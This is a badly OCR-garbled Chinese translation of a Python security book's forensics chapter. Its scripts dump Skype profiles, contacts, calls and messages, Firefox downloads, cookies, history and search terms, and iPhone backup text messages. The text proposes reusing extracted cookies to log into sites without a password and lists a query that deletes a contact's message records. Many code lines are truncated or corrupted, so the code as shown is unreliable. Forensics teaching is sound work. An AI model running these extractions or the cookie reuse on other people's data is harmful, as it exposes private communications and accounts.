if 'partlist' not in str(row[3]): 
if str(row[1]) != str(row[2]): 


msgDirection = 'To ' + str(row[1]) + ': ' 
else: 
msgDirection = 'From ' + str(row[2]) + ': ' 
print('Time: ' + str(row[0]) + ' ' + msgDirection - 
except: 
pass 





将 所 有 的 包装 在 一 起 ， 我 们 有 一 个 非常 强 的 脚本 来 检查 Skype 资料 数据 库 。 我 们 的 
脚本 可 以 打印 配置 文件 信息 ， 联 系 人 地 址 ， 通 话 记 录 其 至 是 存储 在 数据 库 中 的 消 

息 。 我 们 可 以 在 main() 函数 中 添加 一 些 选项 解 村， 利用 0S 模块 的 功能 确保 在 
调查 数据 库 时 执行 每 个 函数 之 前 配置 文件 存在 。 


# coding=UTF-8 
import sqlite3 
import optparse 
import os 


def 


def 


printProfile(skypeDB): 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute( "SELECT fullname, skypename, city, country, 
datetime(profile_timestamp, 'unixepoch') FROM Accounts;") 
for row in c: 
print('[*] -- Found Account --') 
print('[+] User: '+str(row[0])) 
print('[+] Skype Username: '+str(row[1])) 
print('[+] Location: '+str(row[2])+','+str(row[3])) 
print('[+] Profile Date: '+str(row[4])) 
printContacts(skypeDB): 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute( "SELECT displayname, skypename, city, country, 
phone_mobile, birthday FROM Contacts;") 
for row in c: 


print('\n[*] -- Found Contact --') 
print('[+] User : ' + str(row[0])) 
print('[+] Skype Username : ' + str(row[1])) 
if str(row[2]) != '' and str(row[2]) != 'None': 
print('[+] Location : ' + str(row[2]) + ',' + str(row[: 
if str(row[4]) != 'None': 


print('[+] Mobile Number : ' + str(row[4])) 


if str(row[5]) != 'None': 
print('[+] Birthday : ' + str(row[5])) 
def printCallLog(skypeDB): 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute("SELECT datetime(begin_timestamp, 'unixepoch'), ident: 
print('\n[*] -- Found Calls --') 
for row in c: 
print('[+] Time: '+str(row[0]) + ' | Partner: ' + str(row[: 
def printMessages(skypeDB): 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute("SELECT datetime(timestamp, 'unixepoch'), dialog_partr 
print('\n[*] -- Found Messages --') 
for row in c: 
try: 
if 'partlist' not in str(row[3]): 
if str(row[1]) != str(row[2]): 


msgDirection = 'To ' + str(row[1]) + ': ' 
else: 
msgDirection = 'From ' + str(row[2]) + ': ' 
print('Time: ' + str(row[0]) + ' ' + msgDirection - 
except: 
pass 
def main(): 


parser = optparse.OptionParser("usage%prog -p <skype profilepai 
parser.add_option('-p', dest='pathName', type='string', help=': 
(options, args) = parser.parse_args() 

pathName = options.pathName 


if pathName == None: 
print parser .usage 
exit(0) 


elif os.path.isdir(pathName) == False: 
print '[!] Path Does Not Exist: ' + pathName 
exit(0) 
else: 
skypeDB = os.path.join(pathName, 'main.db' ) 
if os.path.isfile(skypeDB) : 
printProfile(skypeDB) 
printContacts(skypeDB) 
printCallLog(skypeDB) 
printMessages(skypeDB) 
else: 
print '[!] Skype Database does not exist: ' + skypeDB 
if _ name == " main_": 
main() 
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运行 该 脚本 ， 我 们 添加 一 个 -p 选项 来 确定 Skype 配置 数据 库 路 径 。 脚 本 打印 出 
存储 在 目标 机 器 上 的 账户 配置 ， 联 系 人 ， 电 话 和 消息 。 成 功 ! 在 下 一 节 中 ， 我 们 将 
用 我 们 的 sqlite3 的 知识 来 调查 流行 的 火狐 浏览 器 存储 的 结构 。 


investigator$ python skype-parse.py -p /root/.Skype/not .myaccount 
[*] -- Found Account -- 

[+] User: TJ OConnor 

[+] Skype Username: <accountname> 

[+] Location: New York, US 

[+] Profile Date: 2010-01-17 16:28:18 

[*] -- Found Contact -- 

[+] User: Some User 

[+] Skype Username : some.user 

[+] Location 

[+] Mobile Number 

[+] Birthday: Basking Ridge, NJ,us: +19085555555: 19750101 

[*] -- Found Calls -- 

[+] Time: 2011-12-04 15:45:20 | Partner: +18005233273 

[+] Time: 2011-12-04 15:48:23 | Partner: +18005210810 

[+] Time: 2011-12-04 15:48:39 | Partner: +18004284322 

[*] -- Found Messages -- 

Time: 2011-12-02 00:13:45 From some.user: Have you made plane reset 
Time: 2011-12-02 00:14:00 To some.user: Working on it... 

Time: 2011-12-19 16:39:44 To some.user: Continental does not have <~ 
Time: 2012-01-10 18:01:39 From some.user: Try United or US Airways, 
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其 他 有 用 的 Skype 查询 


如 果 有 兴趣 的 话 可 以 花 时 间 更 深入 的 调查 Skype 数据 库 ， 编 写 新 的 脚本 。 考 虑 以 下 
可 能 会 用 到 的 其 他 查询 : 


想 只 打印 出 联系 人 列表 中 的 联系 人 生日 ? 





SELECT fullname, birthday FROM contacts WHERE birthday > 0; 


想 打 印 只 有 特定 的 <SKYPE-PARTNER> 联系 人 记录 ? 


SELECT datetime(timestamp, 'unixepoch’), dialog_partner, author, bot 
FROM Messages WHERE dialog_partner = ‘<SKYPE-PARTNER>’ 


4 Say 


想 删除 特定 的 <SKYPE-PARTNER> 联系 记录 ? 





DELETE FROM messages WHERE skypename = ‘<SKYPE-PARTNER>’ 


用 Python 解析 火狐 Sqlite3 数据 库 


在 上 一 节 中 ， 我 们 研究 了 Skype 存储 的 单一 的 应 用 数据 库 。 该 数据 库 提 供 了 大 量 的 

调查 数据 。 在 本 节 中 ， 我 们 将 探究 火狐 存储 的 是 一 系列 的 什么 样 的 数据 库 。 火 狐 存 

储 这 些 数据 库 的 默认 目录 

为 C:\Documents and Settings\<USER>\Application Data\Mozilla\Firefox’ 
， 在 Windows 系统 下 ， 在 MAC OS X 系统 中 存储 在 
/Users/<USER>/Library/Application\ Support/Firefox/Profiles/<profilt 
目录 下 。 让 我 们 列 出 存储 在 目录 中 的 数据 库 吧 。 


investigator$ ls *.sqlite 

places.sqlite downloads.sqlite search.sqlite 

addons.sqlite extensions.sqlite signons.sqlite 
chromeappsstore.sqlite formhistory.sqlite webappsstore.sqlite 
content-prefs.sqlite permissions.sqlite 

cookies.sqlite places.sqlite 


检查 目录 列表 ， 很 明显 火狐 存储 了 相当 丰富 的 数据 。 但 是 我 们 该 从 哪儿 开始 调查 ? 
让 我 们 从 downloads.sqlite 数据 库 开 始 调查 。 downloads.sqlite 文件 存储 
了 火狐 用 户 下 载 文件 的 信息 。 它 包含 了 一 个 表明 为 moz_downloads ， 用 来 存储 文 
件 名 ， 下 载 源 ， 下 载 日 期 ， 文 件 大 小 ， 存 储 在 本 地 的 位 置 等 信息 。 我 们 使 用 一 个 
Python 脚本 来 执行 SELECT 语句 来 查询 适当 的 列 : 名 称 ， 来 源 和 日 期 时 间 。 注 意 
火狐 用 的 也 是 UNIX 时 间 日 期 。 但 为 了 存储 UNIX 时 间 日 期 到 数据 库 ， 它 将 日 期 乘 以 
1000000 秒 ， 因 此 我 们 正确 的 时 间 格 式 应 该 是 除 以 {1000000 秒 。 


import sqlite3 
def printDownloads(downloadDB): 
conn = sqlite3.connect (downloadDB) 
c = conn.cursor() 
c.execute('SELECT name, source, datetime(endTime/1000000, \'un: 


print '\n[*] --- Files Downloaded --- ' 
for row in c: 
print('[+] File: ' + str(row[0]) + ' from source: ' + Str(i 
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对 downloads.sqlite 文件 运行 脚本 ， 我 们 看 到 ， 此 配置 文件 包含 了 我 们 以 前 下 
载 文件 的 信息 。 事 实 上 ， 我 们 是 在 前 面 学 习 元 数据 时 下 载 的 文件 。 


investigator$ python firefoxDownloads.py 
[*] --- Files Downloaded --- 
[+] File: ANONOPS_The_Press_Release.pdf from source: http://www.wit 
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好 极 了 ! 我 们 现在 知道 什么 时 候 用 户 使 用 火狐 下 载 过 什么 文件 。 然 而 ， 如 果 调 查 者 想 
使 用 用 户 的 认证 重新 登陆 到 网 站 该 怎么 办 ? 例如， 警方 调查 员 确 认 用 户 从 基于 邮件 
的 网 站 上 下 载 了 对 儿童 有 害 的 图 片 该 怎么 办 ? 警方 调查 员 想 重新 登陆 到 网 站 ， 最 有 
可 能 的 是 缺少 密码 或 者 是 用 户 认证 的 电子 邮件 。 进 入 cookies， 由 于 HTTP 西 意 缺乏 
状态 设计 ， 网 站 利用 cookies 来 维护 状态 。 








考虑 一 下 ， 例 如 ， 当 用 户 登 陆 到 站 点 ， 如 果 浏 览 器 不 能 维护 cookies， 用 户 需 要 登陆 
能 阅读 每 一 个 人 的 私人 邮件 。 火 狐 存储 了 这 些 cookies 在 cookies. sqlite 数据 
库 中 。 如 调查 员 可 以 提取 cookies 并 重用 ， 就 提供 了 需要 认证 才能 登陆 到 资源 的 条 
件 。 


让 我 们 快速 编写 一 个 Python 脚本 提取 用 户 的 cookies。 我 们 连接 到 数据 库 并 执行 我 
们 的 SELECT 784) ° AIEE P > moz_cookies 维护 这 cookies， 

从 cookies.sqlite 数据 库 中 的 moz_cookies 表 中 ， 我 们 将 查询 主机 ， 名 称 ， 
cookies 的 值 ， 并 在 屏幕 中 打印 出 来 。 


def printCookies(cookiesDB): 
try: 
conn = sqlite3.connect(cookiesDB) 
c = conn.cursor() 
c.execute('SELECT host, name, value FROM moz_cookies' ) 
print('\n[*] -- Found Cookies --') 
for row in c: 
host = str(row[0]) 
name = str(row[1]) 
value = str(row[2] ) 
print('[+] Host: ' + host + ', Cookie: ' + name + ', Vi 
except Exception as e: 
if 'encrypted' in str(e): 
print('\n[*] Error reading your cookies database. ') 
print('[*] Upgrade your Python-Sqlite3 Library' ) 





更 新 sqlite3 


你 可 能 会 注意 到 如 果 你 尝试 用 默认 的 sqlite3 打开 cookies.sqlite 数据 库 会 
报告 文件 被 加 密 lh eas 。 软 认 安 装 的 Sqlite3 的 版 本 是 
Sqlite3.6.22 不 支持 WAL 日 志 模 式 。 最 新 版 本 的 火狐 使 用 

BAA OnE OR Ca Le 模式 在 cookies.sqlite 和 places.sqlite 数据 
库 中 。 试 图 用 旧版 本 的 Sqlite3 或 者 是 sqlite3 模块 会 报错 。 


SQLite version 3.6.22 

Enter ".help" for instructions 

Enter SQL statements terminated with a ";" 

sqlite> select * from moz_cookies; 

Error: file is encrypted or is not a database 

After upgrading your Sqlite3 binary and Pyton-Sqlite3 libraries to 
a version > 3.7, you should be able to open the newer Firefox 
databases. 

investigator:~# sqlite3.7 ~/.mozilla/firefox/nq474mcm.default/ 
cookies.sqlite 

SQLite version 3.7.13 2012-06-11 02:05:22 

Enter ".help" for instructions 

Enter SQL statements terminated with a ";" 

sqlite> select * from moz_cookies; 
1|backtrack-linux.org|__<..SNIPPED. .> 
4|sourceforge.net|sf_mirror_attempt|<..SNIPPED. .> 

To avoid our script crashing on this unhandled error, with the 
cookies.sqlite and places.sqlite databases, we put exceptions to 
catch the encrypted database error message. To avoid receiving 
this error, upgrade your Python-Sqlite3 library or use the older 
Firefox cookies.sqlite and places.sqlite databases included on the 
companion Web site. 


ay | 


为 了 避免 我 们 的 脚本 在 这 个 错误 上 前 溃 ， 我 们 将 cookies,sqlite 和 

places.sqlite 数据 库 放 在 异常 处 理 中 。 eee dele ， 升 级 你 的 

Pythonsqlite3 库 或 使 用 四 版 本 的 火狐 。 调查 者 可 能 也 布 望 列举 浏览 历史 ， 火 狐 存 

， places. sqlite 数据 库 中 。 > moz_places 表 给 我 们 提供 
了 宝贵 的 列 ， 包 含 A 网 站 的 信息 。 而 我 们 的 脚 

本 printHistory() 函数 只 考虑 到 moz_places 表 ， 而 维基 百科 推荐 使 

用 moz_places 表 和 moz_historyvisits 表 得 到 浏览 器 历史 。 


def printHistory(placesDB): 
try: 
conn = sqlite3.connect(placesDB) 
c = conn.cursor() 
c.execute("select url, datetime(visit_date/1000000, 
"unixepoch') from moz_places, moz_historyvisits where visili 
© and moz_places.id==moz_historyvisits.place_id;") 
print('\n[*] -- Found History --') 
for row in c: 
url = str(row[0]) 
date = str(row[1]) 
print '[+] ' + date + ' - Visited: ' + url 
except Exception as e: 
if 'encrypted' in str(e): 
print('\n[*] Error reading your places database. ') 
print('[*] Upgrade your Python-Sqlite3 Library' ) 
exit(0) 





让 我 们 使 用 最 后 的 知识 和 先前 的 正则 表达 式 的 知识 扩展 我 们 的 函数 。 浏 览 历史 及 其 
有 价值 ， 对 深入 了 解 一 些 特定 的 URL ARA A o Google 搜索 查询 包含 搜索 URL 内 部 
的 权限 ， 比 如 说 ， 在 无 线 的 章节 里 ， 我 们 将 就 此 展开 深入 。 然 而 ， 现 在 让 我 们 只 提 
取 搜 索 条 件 URL 右边 的 条 目 。 如 果 在 我 们 的 历史 里 发 现 包含 Google， 我 们 发 现 他 
的 特点 q= 后 面 跟随 者 & 。 这 个 特定 的 字符 序列 标识 Google 2K ° Ww RANT AN 
找到 这 个 条 目 ， 我 们 将 通过 用 空格 替换 一 些 URL 中 用 的 字符 来 清理 输出 。 最 后 ， 我 
们 将 打印 校正 后 的 输出 到 屏幕 上 ， 现 在 我 们 有 一 个 函数 可 以 搜索 places.sqlite 
文件 并 打印 Google 搜索 查询 历史 。 


import sqlite3, re 
def printGoogle(placesDB): 
conn = sqlite3.connect(placesDB) 
c = conn.cursor() 
c.execute("select url, datetime(visit_date/1000000, 'unixepoch 
from moz_places, moz_historyvisits where visit_count > © and m 
print('\n[*] -- Found Google --') 
for row in c: 
url = str(row[0]) 
date = str(row[1]) 
if 'google' in url.lower(): 
r = re.findall(r'q=.*\&', url) 


ale ee 
search=r[0].split('&')[0] 
search=search.replace('q=', '').replace('+', ' ') 
print('[+] '+date+' - Searched For: ' + search) 


JE SSS Se 





将 所 有 的 包装 在 一 起 ， 我 们 现在 有 下 载 文件 信息 ， 读 取 cookies 和 浏览 历史 ， 甚 至 
是 用 户 的 Google 的 搜索 历史 功能 。 该 选项 的 解析 应 该 看 看 前 面 非常 相似 的 Skype 
数据 库 的 探究 。 


你 可 能 注意 到 使 用 os,join.path 函数 来 创建 完整 的 路 径 会 问 为 什么 不 是 只 添加 
路 径 和 文件 的 字符 串 值 在 一 起 。 是 什么 让 我 们 不 这 样 使 用 让 我 们 来 看 一 个 例子 : 


downloadDB 
downloadDB 


pathName + “\\downloads.sqlite” #4 
os.path.join(pathName, “downloads.sqlite” ) 


4 Fa —F » Windows 用 户 使 用 C:\Users\<user_name>\ 来 表示 路 径 ， 而 Linux 
和 Mac OS 使 用 /home/<user_name>/ 来 表示 用 户 路 径 ， 不 同 的 操作 系统 中 ， 斜 
杠 表 示 的 意义 不 一 样 ， 这 点 当 我 们 创建 文件 的 完整 路 径 时 不 得 不 考虑 。 OS A 
许 我 们 创建 一 个 独立 于 操作 系统 都 能 工作 的 脚本 。 


# coding=UTF-8 
import sqlite3 
import re 
import optparse 
import os 
def printDownloads(downloadDB): 
conn = sqlite3.connect (downloadDB) 
c = conn.cursor() 
c.execute('SELECT name, source, datetime(endTime/1000000, \'un: 
print '\n[*] --- Files Downloaded --- ' 
for row in c: 
print('[+] File: ' + str(row[0]) + ' from source: ' + Str(i 
def printCookies(cookiesDB): 
try: 
conn = sqlite3.connect(cookiesDB) 
c = conn.cursor() 
c.execute('SELECT host, name, value FROM moz_cookies') 
print('\n[*] -- Found Cookies --') 
for row in c: 
host = str(row[0]) 
name = str(row[1]) 
value = str(row[2]) 
print('[+] Host: ' + host + ', Cookie: ' + name + ', Vé 
except Exception as e: 
if 'encrypted' in str(e): 
print('\n[*] Error reading your cookies database. ' ) 
print('[*] Upgrade your Python-Sqlite3 Library' ) 
def printHistory(placesDB) : 
try: 
conn = sqlite3.connect(placesDB) 
c = conn.cursor() 
c.execute("Sselect url, datetime(visit_date/1000000, 'unixey 
print('\n[*] -- Found History --') 
for row in c: 
url = str(row[0]) 
date = str(row[1]) 
print '[+] ' + date + ' - Visited: ' + url 
except Exception as e: 
if ‘encrypted’ in str(e): 


print('\n[*] Error reading your places database. ' ) 
print('[*] Upgrade your Python-Sqlite3 Library' ) 
exit(0) 
def printGoogle(placesDB): 
conn = sqlite3.connect(placesDB) 
c = conn.cursor() 
c.execute("select url, datetime(visit_date/1000000, 'unixepoch 
print('\n[*] -- Found Google --') 
for row in c: 
url = str(row[0]) 
date = str(row[1]) 
if 'google' in url.lower(): 
r = re.findall(r'q=.*\&', url) 


i ie 
search=r[0].split('&')[0] 
search=search.replace('q=', '').replace('+', ' ') 
print('[+] '+date+' - Searched For: ' + search) 


def main(): 
parser = optparse.OptionParser("usage%prog -p <firefox profile 
parser.add_option('-p', dest='pathName', type='string', help=': 
(options, args) = parser.parse_args() 
pathName = options.pathName 


if pathName == None: 
print(parser.usage) 
exit (0) 


elif os.path.isdir(pathName) == False: 
print('[!] Path Does Not Exist: ' + pathName) 
exit (0) 
else: 
downloadDB = os.path.join(pathName, 'downloads.sqlite' ) 
if os.path.isfile(downloadDB): 
printDownloads(downloadDB) 
else: 
print('[!] Downloads Db does not exist: '+downloadDB) 
cookiesDB = os.path.join(pathName, 'cookies.sqlite' ) 
if os.path.isfile(cookiesDB): 
printCookies(cookiesDB) 
else: 
print('[!] Cookies Db does not exist:' + cookiesDB) 
placesDB = os.path.join(pathName, 'places.sqlite' ) 
if os.path.isfile(placesDB): 
printHistory(placesDB) 
printGoogle(placesDB) 


else: 
print('[!] PlacesDb does not exist: ' + placesDB) 
if _name == "_ main_": 
main() 
a 人 





运行 我 们 的 脚本 调查 火狐 用 户 的 配置 文件 ， pubis 这 些 结果 。 在 下 一 节 中 ， 
我 们 将 使 用 部 分 我 们 前 面 学 到 的 技巧 ， 但 是 通过 在 数据 库 的 干草 堆 中 搜索 一 根 针 来 
扩展 我 们 的 SQLite 知识 。 


investigator$ python parse-firefox.py -p ~/Library/Application\Supy; 





[*] --- Files Downloaded --- 

[+] File: ANONOPS_The_Press_Release.pdf from source: http://www.wil 
[*] -- Found Cookies -- 

[+] Host: .mozilla.org, Cookie: wtspl, Value: 894880 

[+] Host: www.webassessor.com, Cookie: __utma, Value: 1.2246604404( 
[*] -- Found History -- 


[+] 2011-11-20 16:28:15 - Visited: http://www.mozilla.com/en-US/fil 
[+] 2011-11-20 16:28:16 - Visited: http://www.mozilla.org/en-US/fil 
[*] -- Found Google -- 

[+] 2011-12-14 05:33:57 - Searched For: The meaning of life? 

[+] 2011-12-14 05:52:40 - Searched For: Pterodactyl 

[+] 2011-12-14 05:59:50 - Searched For: How did Lost end? 





用 Python 调查 移动 设备 的 iTunes 备份 


在 2011 年 4 月 ， 安 全 研究 人 员 和 前 苹果 员工 公开 了 iPhone 和 |pad IOS 操作 系统 的 
一 个 隐私 问题 。 一 个 重要 的 调查 之 后 发 现 |OS 系统 事实 上 跟踪 和 记录 设备 的 GPS Æ 
标 并 存储 在 手机 的 consolidated.db 数据 库 中 。 在 这 个 数据 库 中 一 个 名 为 

Cell-Location 的 表 包 含 了 收集 的 手机 的 GPS 坐标 。 该 设备 通过 综合 了 最 近 的 
手机 信号 发 射 塔 来 确定 定位 信息 为 用 户 提供 更 好 的 服务 。 然 而 ， 安 全 人 员 提 出 ， 该 
收据 可 能 会 被 恶意 的 使 用 ， 用 来 跟踪 iPhone/lpad 用 户 的 完整 活动 路 线 。 此 外 ， 使 
用 备份 和 存储 移动 设备 的 信息 到 电脑 上 也 记录 了 这 些 信息 。 虽 然 定位 记录 信息 已 经 
从 苹果 系统 中 移出 了 ， 但 发 现 数据 的 过 程 任 然 还 在 。 在 本 节 中 ， 我 们 将 重复 这 一 过 
程 ， 从 iPhone 设备 中 提取 备份 信息 。 上 有 具体 来 说 ， 我 们 将 使 用 Python 脚本 从 IOS 备 
份 中 提取 所 有 的 文本 消息 。 


当 用 户 对 iPhone 或 者 iPad 设备 进行 备份 时 ， 它 将 文件 存储 到 机 器 的 特殊 目录 。 对 
于 Windows 系统 ，iTunes 程序 存储 移动 设备 备份 目录 在 

C:\Documents and Settings\<USERNAME>\Application Data\AppleComputer’ 
下 ， 在 Mac OS X 系统 上 储存 目录 在 

/UsersS/<USERNAME>/Library/Application Support/MobileSync/Backup/ ° 
iTunes 程序 备份 移动 设备 存储 所 有 的 移动 设备 到 这 些 目录 下 。 让 我 们 来 探究 我 的 
iPhone 最 近 的 备份 文件 。 


investigator$ ls 
68b16471ed678a3a470949963678d47b7a415be3 
68c96ac7d7FO02c20e30ba2acc8d91c42F7d2F77F 
68b16471ed678a3a470949963678d47b7a415be3 
68d321993fe03f7Fe6754F5F4ba15a9893Fe38db 
69005cb27b4af77b149382d1669ee34b30780c99 
693a31889800047 F02c64b0a744e68d2a2cf F267 
6957b494a71F191934601d08ea579b889F417aFf9 
698b7961028238a63d02592940088f232d23267e 
6a2330120539895328d6e84d5575cf44a082c62d 
<,..SNIPPED. .> 


为 了 获得 关于 每 个 文件 更 多 的 信息 ， 我 们 将 使 用 UNIX 命令 file 来 提取 每 个 文件 
的 文件 类 型 。 这 个 命令 使 用 文件 头 的 字 节 信息 类 确认 文件 类 型 。 这 为 我 们 提供 了 更 
多 的 信息 ， 我 们 看 到 移动 备份 目录 包含 了 一 些 sqlite3 数据 库 ，JPEG 图 像 ， 原 
始 数 据 和 ASCI| 文本 文件 。 


investigator$ file * 
68b16471ed678a3a470949963678d47b7a415be3: data 
68c96ac7d7FO2c20e30ba2acc8d91c42F7d2F77F: SQLite 3.x database 
68b16471ed678a3a470949963678d47b7a415be3: JPEG image data 
68d321993fe03F7 Fe6754F5F4bai5a9893fe38db: JPEG image data 
69005cb27b4af77b149382d1669ee34b30780c99: JPEG image data 
693a31889800047F02c64b0a744e68d2a2cfFf267: SQLite 3.x 
database 

6957b494a71F191934601d08ea579b889F417af9: SQLite 3.x 
database 

698b7961028238a63d02592940088f232d23267e: JPEG image data 
6a2330120539895328d6e84d5575cf44a082c62d: ASCII English 
text 

<..SNIPPED. .> 


file 命令 让 我 们 知道 一 些 文件 包含 SQLite 数据 库 并 对 灭 个 数据 库 的 内 容 有 少量 
的 描述 。 我 们 将 使 用 Python 脚本 快速 的 快速 的 枚 举 在 移动 备份 目录 下 找到 的 每 一 个 
数据 库 的 所 有 的 表 。 注 意 我 们 将 再 次 在 我 们 的 Python 脚本 中 使 用 sqlite3 。 我 们 
的 脚本 列 出 工作 目录 的 内 容 然后 尝试 连接 每 一 个 数据 库 。 对 于 那些 成 功 的 连接 ， 脚 
本 将 执行 命 
令 : SELECT tbl_name FROM sqlite_masterWHERE type==‘table’ 。， 每 一 个 
SQLite 数据 库 维 护 了 一 个 sqlite_master 的 表 包 含 了 数据 库 的 总 体 结构 ， 说 明 
了 数据 库 的 总 体 架 构 。 上 面 的 命令 允许 我 们 列举 数据 库 模式 。 


import os 
import sqlite3 
def printTables(iphoneDB): 


try: 
conn = sqlite3.connect (iphoneDB) 
c = conn.cursor() 
c.execute('SELECT tbl_name FROM sqlite master WHERE type==* 
print("\n[*] Database: "+iphoneDB) 
for row in c: 
print("[-] Table: "+str(row) ) 
except: 
pass 
finally: 


conn.close() 
dirList = os.listdir(os.getcwd()) 
for fileName in dirList: 
printTables( fileName) 








运行 我 们 的 脚本 ， 我 们 列举 了 移动 备份 目录 里 的 所 有 的 数据 库 模 式 。 当 脚本 找到 多 
个 数据 库 ， 我 们 将 整理 输出 我 们 关心 的 特定 的 数据 库 。 注 意 文件 名 

为 dOd7e5fb2ce288813306e4d4636395e047a3d28 包含 了 一 个 SQLite 数据 库 里 
面 有 一 个 名 为 messages 的 表 。 该 数据 库 包 含 了 存储 在 iPhone 备份 中 的 文本 消息 
列表 。 


A python listTables.py 


<.. SNIPPED. 

K] Database: Oe E Oe re ree 
[-] Table: (u'ItemTable', ) 

[*] Database: d0d7e5fb2ce288813306e4d4636395e047a3d28 
[-] Table: (u'_SqliteDatabaseProperties', ) 

[-] Table: (u'message', ) 

[-] Table: (u'sglite_sequence', ) 

[-] Table: (u'msg_group', ) 

[-] Table: (u'group_member', ) 

[-] Table: (u'msg_pieces', ) 

[-] Table: (u'madrid_attachment', ) 

[-] Table: (u'madrid_chat', ) 

[*] Database: 3de971e20008baa84ec3b2e70fc171ica24eb4f58 
[-] Table: (u'ZFILE', ) 

[-] Table: (u'Z_1LABELS', ) 

<..SNIPPED. ,> 


虽然 现在 我 们 知道 SQLite 数据 库 文 

件 dod7e5fb2ce288813306e4d4636395e047a3d28 包含 了 文本 消息 ， 我 们 想 要 能 
够 自动 的 对 不 同 的 备份 进行 调查 。 为 了 执行 这 个 
为 isMessageTable() ， 这 个 函数 将 连接 数据 库 并 枚 举 数据 库 模 式 信息 。 如 果 文 
件 包 含 名 为 messages 的 表 ， 则 返回 True ， pees. False 。 现 在 我 们 
有 能 力 快速 扫描 目录 下 的 上 千 个 文件 并 确认 包含 messages 表 的 特定 数据 库 。 


def isMessageTable(iphoneDB): 
try: 
conn = sqlite3.connect(iphoneDB) 
c = conn.cursor() 
c.execute('SELECT tbl_name FROM sqlite master WHERE type==\"tal 
for row in c: 
if 'message' in str(row): 
return True 
except: 
return False 


Eee 


现在 ， 我 们 可 以 定位 文本 消息 数据 库 了 ， 我 们 希望 可 以 打印 包含 在 数据 库 中 的 内 
容 ， 如 时 间 ， 地 址 ， 文 本 消息 。 为 此 ， 我 们 连接 数据 库 并 执行 以 下 命 
令 : select datetime(date: unixepoch\’ ), address, text from message 


我 们 可 以 打印 查询 结果 到 屏幕 上 上。 注意 ， 我 们 将 使 用 一 些 异 常 处 理 ， 如 





果 isMessageTable() 返回 的 数据 库 不 是 我 们 需要 的 文本 信息 数据 库 ， 它 将 不 包 
含 数据 ， 地 址 ， 和 文本 的 列 。 如 果 我 们 去 错 了 数据 库 ， 我 们 将 允许 脚本 捕获 异常 并 
继续 执行 ， 直 到 找到 正确 的 数据 库 。 


def printMessage(msgDB): 
try: 
conn = sqlite3.connect(msgDB) 
c = conn.cursor() 
c.execute('select datetime(date, \'unixepoch\'),address, text fi 
for row inc: 
date = str(row[0]) 
addr str(row[1] ) 
text = row[2] 
print('\n[+] Date: 'tdate+', Addr: 'taddr + ' Message: ' + 


except: 
pass 


Ei 





包装 这 些 函 数 在 一 起 ， 我 们 可 以 构建 最 终 的 脚本 。 我 们 将 添加 一 个 选项 解析 来 执行 
iPhone 备份 的 目录 。 接 下 来 ， 我 们 将 列 出 该 目录 的 内 容 并 测试 每 一 个 文件 直到 找到 
文本 信息 数据 库 。 一 旦 我 们 找到 这 个 文件 ， 我 们 可 以 打印 数据 库 的 内 容 在 屏幕 上 。 


# coding=UTF-8 
import os 
import sqlite3 
import optparse 
def isMessageTable(iphoneDB) : 
try: 
conn = sqlite3.connect(iphoneDB) 
c = conn.cursor() 
c.execute('SELECT tbl_name FROM sqlite master WHERE type==* 
for row in c: 
if 'message' in str(row): 
return True 
except: 
return False 
def printMessage(msgDB): 
try: 
conn = sqlite3.connect(msgDB) 
c = conn.cursor() 
c.execute('select datetime(date, \'unixepoch\'),address, te) 
for row in c: 
date = str(row[0]) 
addr str(row[1] ) 
text row[2] 
print('\n[+] Date: '+tdate+', Addr: '+addr + ' Message: 


except: 
pass 
def main(): 
parser = optparse.OptionParser("usage%prog -p <iPhone Backup D: 
parser.add_option('-p', dest='pathName', type='string',help='sy 
(options, args) = parser.parse_args() 
pathName = options.pathName 


if pathName == None: 
print parser.usage 
exit (0) 

else: 


dirList = os.listdir(pathName) 

for fileName in dirList: 

iphoneDB = os.path.join(pathName, fileName) 
if isMessageTable(iphoneDB): 


try: 
print('\n[*] --- Found Messages ---') 
printMessage(iphoneDB) 
except: 
pass 
if _name_ == ' main_': 


main() 


LE 





对 iPhone 备份 目录 运行 这 个 脚本 ， 我 们 可 以 看 到 一 些 存 储 在 iPhone 备份 中 的 最 近 
的 文本 消息 。 


investigator$ python iphoneMessages.py -p ~/Library/Application\Suj 
[*] --- Found Messages --- 

[+] Date: 2011-12-25 03:03:56, Addr: 55555554333 Message: Happy ho- 
[+] Date: 2011-12-27 00:03:55, Addr: 55555553274 Message: You didni 
[+] Date: 2011-12-27 00:47:59, Addr: 55555553947 Message: Quick que 
<,.SNIPPED. ,> 


al Ee 








a 2m by 
本 和 草 总 结 


再 次 祝贺 ! 在 本 章 调 查 数字 结构 时 我 们 已 经 编写 了 不 少 工具 了 。 通 过 调查 Windows 
注册 表 和 回收 站 ， 藏 在 元 数据 中 的 结构 ， 应 用 程序 存储 的 数据 库 我 们 又 增加 了 一 些 
有 用 的 工具 到 我 们 的 工具 库 中 。 项 望 你 建立 在 本 章 的 例子 基础 回答 你 将 来 调查 中 的 
问题 。 


第 四 草 网 络 流 量 分 析 


REAR: 


1. 网 络 协议 流量 定位 地 理 位 置 

2. 发 现 恶 意 的 DDos 工 具 

3. 找到 隐藏 的 网 络 扫描 

4. T Stormy Fastifi = 47 Conficker#& $ 49 Domainii = 
5. 理解 TCP 序 列 预测 攻击 

6. 手工 发 包 挫 败 入 侵 检 测 系 统 


比 起 被 限制 在 单独 的 维度 中 ， 武 术 更 应 该 成 为 我 们 的 生活 方式 ， 我 们 的 理念 ， 
我 们 对 孩子 的 教育 ， 我 们 投入 的 工作 ， 我 们 建立 的 关系 网 ， 我 们 每 天 所 做 的 选 
择 的 延伸 。 


一 Daniele Bolelli 第 四 度 卫冕 黑 带 功夫 秀 


简介 : 极光 行动 以 及 如 何 明显 的 被 避免 


2010 年 1 月 14 日 ， 美 国 了 解 到 一 次 针对 Google,Adode 和 其 他 30 多 个 全 球 100 强 公司 
的 协调 的 ， 复 杂 的 并 且 持 久 性 的 电脑 攻击 。 这 次 攻击 被 称 为 极光 行动 ， 在 受 感染 的 
机 器 上 发 现 了 一 个 文件 来， 这 次 攻击 使 用 了 一 个 新 的 exploit， 以 前 没有 被 发 现 。 尽 
管 微软 知道 这 个 漏洞 的 存在 ， 但 它 错误 的 假定 没有 人 知道 这 个 漏洞 ， 所 以 不 存在 这 
种 攻击 的 检测 机 制 。 为 了 攻击 他 们 的 受害 者 ， 攻 击 者 通过 发 送 一 封 给 受害 者 包含 恶 
